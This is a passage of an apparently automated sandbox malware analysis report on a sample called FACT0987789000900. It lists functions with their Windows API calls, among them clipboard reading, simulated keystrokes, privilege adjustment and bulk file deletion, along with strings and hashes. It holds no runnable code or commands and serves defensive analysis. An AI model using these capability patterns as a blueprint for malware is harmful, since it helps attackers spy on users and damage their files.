Function 01347420 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0134742B

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: f44097e030dd42e78dcce65f487aec5607df50b0ddae4a1e88a92db6d202515d
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: D6D0A77090520CEBCB10CFB89C04AEA77ECD704324F004754FD15D3381D631A9509790

Function 01348E3C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01348E51

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 1f1d90ee44e667335b7811dd975afe8f88146841a1e5314571dc1cf9122a407f
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 52E0BF7494010DEFDB10EFE4D5496DE7BB4EF04301F1005A1FD05E7691DB309E548A62

Function 01348E40 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01348E51

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: f3838cd2db701bcdab544bca33302da30878494c26d7274f09b686b70d8a4a53
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: F0E0E67494010DDFDB00EFF4D54969E7FF4EF04301F1001A1FD05E2281D6309D508A62

Non-executed Functions

Function 004FAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004FB1CD

Strings

%d/%02d/%02d, xrefs: 004FAEFC

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 177c84c8f72e0a3f185b676e881ae89b0ef8997aad2724b15d00e47baf3e8bc1
Instruction ID: 14bb95bd962f9455212e149adfeb4a0d6138a4e599058f57dfb9e804db8dc8e9
Opcode Fuzzy Hash: 177c84c8f72e0a3f185b676e881ae89b0ef8997aad2724b15d00e47baf3e8bc1
Instruction Fuzzy Hash: 0712D1B1500218ABEB249F65CD49FBB7BB8FF49310F10811AFA19DB2D0DB788905CB65

Function 004AEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 004AEB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00503AEA
IsIconic.USER32(000000FF), ref: 00503AF3
ShowWindow.USER32(000000FF,00000009), ref: 00503B00
SetForegroundWindow.USER32(000000FF), ref: 00503B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00503B20
GetCurrentThreadId.KERNEL32 ref: 00503B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00503B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00503B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00503B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00503B54
SetForegroundWindow.USER32(000000FF), ref: 00503B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B6C
keybd_event.USER32(00000012,00000000), ref: 00503B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B81
keybd_event.USER32(00000012,00000000), ref: 00503B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B8F
keybd_event.USER32(00000012,00000000), ref: 00503B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00503B9E
keybd_event.USER32(00000012,00000000), ref: 00503BA3
SetForegroundWindow.USER32(000000FF), ref: 00503BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00503BCD

Strings

Shell_TrayWnd, xrefs: 00503AE5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: fc62964508f5a018eefa114ea9a84fab77f12b2f541830c61d3a774040a5f77a
Instruction ID: 4d9139333da26e741a6c00c90d3090352b78767f899b0337577403b2f9b30d3b
Opcode Fuzzy Hash: fc62964508f5a018eefa114ea9a84fab77f12b2f541830c61d3a774040a5f77a
Instruction Fuzzy Hash: 8A318471A40318BBEB206BA58C4AFBF7F7CEB54B54F118415FA05EA1D0D6B15D04AAB0

Function 004CACC5 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 004CB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004CB180
Part of subcall function 004CB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004CB1AD
Part of subcall function 004CB134: GetLastError.KERNEL32 ref: 004CB1BA

_memset.LIBCMT ref: 004CAD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004CAD5A
CloseHandle.KERNEL32(?), ref: 004CAD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004CAD82
GetProcessWindowStation.USER32 ref: 004CAD9B
SetProcessWindowStation.USER32(00000000), ref: 004CADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004CADBF

Part of subcall function 004CAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004CACC0), ref: 004CAB99
Part of subcall function 004CAB84: CloseHandle.KERNEL32(?,?,004CACC0), ref: 004CABAB

Strings

winsta0\default, xrefs: 004CAE40
, xrefs: 004CAD17
winsta0, xrefs: 004CAD7D
default, xrefs: 004CADBA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0$winsta0\default
API String ID: 2063423040-1685893292
Opcode ID: 12e7d9ee8d8fc640ee8aba9ab2786b22f32131d5ef4b3310525e8fa4a75a2717
Instruction ID: 6cd843dceadc445128d797bd0ba972f9bd42e934d56b08441b2335143ff51e36
Opcode Fuzzy Hash: 12e7d9ee8d8fc640ee8aba9ab2786b22f32131d5ef4b3310525e8fa4a75a2717
Instruction Fuzzy Hash: DC81587580020DAFDF519FA4CC49EEEBB78EF18308F04811EF914A6261D7798E64DB66

Function 004D60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004D5FA6,?), ref: 004D6ED8

Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004D5FA6,?), ref: 004D6EF1

Part of subcall function 004D725E: __wsplitpath.LIBCMT ref: 004D727B
Part of subcall function 004D725E: __wsplitpath.LIBCMT ref: 004D728E

Part of subcall function 004D72CB: GetFileAttributesW.KERNEL32(?,004D6019), ref: 004D72CC

_wcscat.LIBCMT ref: 004D6149
_wcscat.LIBCMT ref: 004D6167
__wsplitpath.LIBCMT ref: 004D618E
FindFirstFileW.KERNEL32(?,?), ref: 004D61A4
_wcscpy.LIBCMT ref: 004D6209
_wcscat.LIBCMT ref: 004D621C
_wcscat.LIBCMT ref: 004D622F
lstrcmpiW.KERNEL32(?,?), ref: 004D625D
DeleteFileW.KERNEL32(?), ref: 004D626E
MoveFileW.KERNEL32(?,?), ref: 004D6289
MoveFileW.KERNEL32(?,?), ref: 004D6298
CopyFileW.KERNEL32(?,?,00000000), ref: 004D62AD
DeleteFileW.KERNEL32(?), ref: 004D62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004D62E1
FindClose.KERNEL32(00000000), ref: 004D62FD
FindClose.KERNEL32(00000000), ref: 004D630B

Strings

\*.*, xrefs: 004D6138, 004D6147, 004D6165

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 88f868698930d69e381ec5d6a6df4dec761b67f9bc8b4255d47de203e5f3b78a
Instruction ID: 42574a0236cde17a64526605e30654406678e45cf1488f840a40feff6119171d
Opcode Fuzzy Hash: 88f868698930d69e381ec5d6a6df4dec761b67f9bc8b4255d47de203e5f3b78a
Instruction Fuzzy Hash: 2651307280811C6ACB21EB91CC54DDFB7BCAF15304F0641EBE595E2241DB3A97498FA8

Function 004E6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0052DC00), ref: 004E6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 004E6B44
GetClipboardData.USER32(0000000D), ref: 004E6B4C
CloseClipboard.USER32 ref: 004E6B58
GlobalLock.KERNEL32(00000000), ref: 004E6B74
CloseClipboard.USER32 ref: 004E6B7E
GlobalUnlock.KERNEL32(00000000), ref: 004E6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 004E6BA0
GetClipboardData.USER32(00000001), ref: 004E6BA8
GlobalLock.KERNEL32(00000000), ref: 004E6BB5
GlobalUnlock.KERNEL32(00000000), ref: 004E6BE9
CloseClipboard.USER32 ref: 004E6CF6

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 5830ee31a176155dade531e50b4c29e7fdc0ecf2920277d7d60bd6a37b1d5989
Instruction ID: cb233ce545bf0dcdd7d536d6ce206205476265c0a47fb7b05513a9d05508fad6
Opcode Fuzzy Hash: 5830ee31a176155dade531e50b4c29e7fdc0ecf2920277d7d60bd6a37b1d5989
Instruction Fuzzy Hash: 3651D1312002016FD700AF62DC86FAF77B8AF64B46F01442EF556D22D0DF78E8099A6A

Function 004DF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004DF62B
FindClose.KERNEL32(00000000), ref: 004DF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004DF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004DF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 004DF6E2
__swprintf.LIBCMT ref: 004DF72E
__swprintf.LIBCMT ref: 004DF767
__swprintf.LIBCMT ref: 004DF7BB

Part of subcall function 004B172B: __woutput_l.LIBCMT ref: 004B1784

__swprintf.LIBCMT ref: 004DF809
__swprintf.LIBCMT ref: 004DF858
__swprintf.LIBCMT ref: 004DF8A7
__swprintf.LIBCMT ref: 004DF8F6

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 004DF728
%4d, xrefs: 004DF761
%02d, xrefs: 004DF7B0, 004DF7B9, 004DF807, 004DF856, 004DF8A5, 004DF8F4

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 805175138aeea86ccd50ee8398dad05f7a166a8beec258b05188aca1510f8d70
Instruction ID: b96a0a46482ec83b20580dcdcd7e7b2585c8242fba406cc9e37c0f3e4f887be1
Opcode Fuzzy Hash: 805175138aeea86ccd50ee8398dad05f7a166a8beec258b05188aca1510f8d70
Instruction Fuzzy Hash: 99A130B2408344ABC710EBA5C896DAFB7ECAF99704F40482FF595C3152EB38D949C766

Function 004E1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004E1B50
_wcscmp.LIBCMT ref: 004E1B65
_wcscmp.LIBCMT ref: 004E1B7C
GetFileAttributesW.KERNEL32(?), ref: 004E1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 004E1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 004E1BC0
FindClose.KERNEL32(00000000), ref: 004E1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 004E1BE7
_wcscmp.LIBCMT ref: 004E1C0E
_wcscmp.LIBCMT ref: 004E1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 004E1C37
SetCurrentDirectoryW.KERNEL32(005439FC), ref: 004E1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 004E1C5F
FindClose.KERNEL32(00000000), ref: 004E1C6C
FindClose.KERNEL32(00000000), ref: 004E1C7C

Strings

*.*, xrefs: 004E1BE2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: fc98865f7b7e224a481c945f707847309676a5b37254517b982f4afe22c40420
Instruction ID: f8f27f8975d66f05802f48fd85eab52a6a6440b7ff3237a5394c7d752d1b1f1a
Opcode Fuzzy Hash: fc98865f7b7e224a481c945f707847309676a5b37254517b982f4afe22c40420
Instruction Fuzzy Hash: E531D5325802597FDF10AFB1DC49ADE77BCAF05325F104556E812D21A0EB78DB89CA68

Function 004FF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

DragQueryPoint.SHELL32(?,?), ref: 004FF37A

Part of subcall function 004FD7DE: ClientToScreen.USER32(?,?), ref: 004FD807
Part of subcall function 004FD7DE: GetWindowRect.USER32(?,?), ref: 004FD87D
Part of subcall function 004FD7DE: PtInRect.USER32(?,?,004FED5A), ref: 004FD88D

SendMessageW.USER32(?,000000B0,?,?), ref: 004FF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004FF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004FF411
_wcscat.LIBCMT ref: 004FF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 004FF458
SendMessageW.USER32(?,000000B0,?,?), ref: 004FF471
SendMessageW.USER32(?,000000B1,?,?), ref: 004FF488
SendMessageW.USER32(?,000000B1,?,?), ref: 004FF4AA
DragFinish.SHELL32(?), ref: 004FF4B1
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 004FF59C

Strings

@GUI_DRAGID, xrefs: 004FF510
@GUI_DROPID, xrefs: 004FF4D1
@GUI_DRAGFILE, xrefs: 004FF54B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: 6dcc70e80ccf7e6d2f0f9568b314267cd1de8e43846a768a31f2c99d7645d527
Instruction ID: d2d6d6a506921209af5de0c41ca566819105f070dc4fabf9277b06c41848c68c
Opcode Fuzzy Hash: 6dcc70e80ccf7e6d2f0f9568b314267cd1de8e43846a768a31f2c99d7645d527
Instruction Fuzzy Hash: 14616C71008304AFC700EF65CC85EAFBBF8BF99714F004A2EF695961A1DB749909CB66

Function 004E1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004E1CAB
_wcscmp.LIBCMT ref: 004E1CC0
_wcscmp.LIBCMT ref: 004E1CD7

Part of subcall function 004D6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004D6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 004E1D06
FindClose.KERNEL32(00000000), ref: 004E1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 004E1D2D
_wcscmp.LIBCMT ref: 004E1D54
_wcscmp.LIBCMT ref: 004E1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 004E1D7D
SetCurrentDirectoryW.KERNEL32(005439FC), ref: 004E1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 004E1DA5
FindClose.KERNEL32(00000000), ref: 004E1DB2
FindClose.KERNEL32(00000000), ref: 004E1DC2

Strings

*.*, xrefs: 004E1D28

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 29676bbf9cf051d415efe0527691d2afe594097923025f17fa5a832163f880f4
Instruction ID: d094c8759b5f86109397de1ee92adcd2434f56d3640d7b6b29bccea17c99bf3d
Opcode Fuzzy Hash: 29676bbf9cf051d415efe0527691d2afe594097923025f17fa5a832163f880f4
Instruction Fuzzy Hash: C83116325802597ACF10AFA1DC49EDE77BCAF05325F104557E811E22B0DB78EA49CA68

Function 004E091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004E09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 004E09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004E09FB
__wsplitpath.LIBCMT ref: 004E0A59
_wcscat.LIBCMT ref: 004E0A71
_wcscat.LIBCMT ref: 004E0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004E0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 004E0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 004E0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 004E0AFF
_wcscpy.LIBCMT ref: 004E0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004E0B4A

Strings

*.*, xrefs: 004E0B05

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 99ea4e45895b8621e4d746a41e2cf55a8e71246c1954dea3b51dabad14edce87
Instruction ID: c11835a8beeda5072531bfdc6995486375224fa7bee8cd0d43d7d2b1019eef1b
Opcode Fuzzy Hash: 99ea4e45895b8621e4d746a41e2cf55a8e71246c1954dea3b51dabad14edce87
Instruction Fuzzy Hash: 0F618B725042459FCB10EF61C84099FB3E8FF89314F04492EF999C7252EB79E945CB96

Function 004FEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004FEF3B
GetFocus.USER32 ref: 004FEF4B
GetDlgCtrlID.USER32(00000000), ref: 004FEF56
_memset.LIBCMT ref: 004FF081
GetMenuItemInfoW.USER32 ref: 004FF0AC
GetMenuItemCount.USER32(00000000), ref: 004FF0CC
GetMenuItemID.USER32(?,00000000), ref: 004FF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 004FF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 004FF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004FF193
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 004FF1C8

Strings

0, xrefs: 004FF079

Memory Dump Source

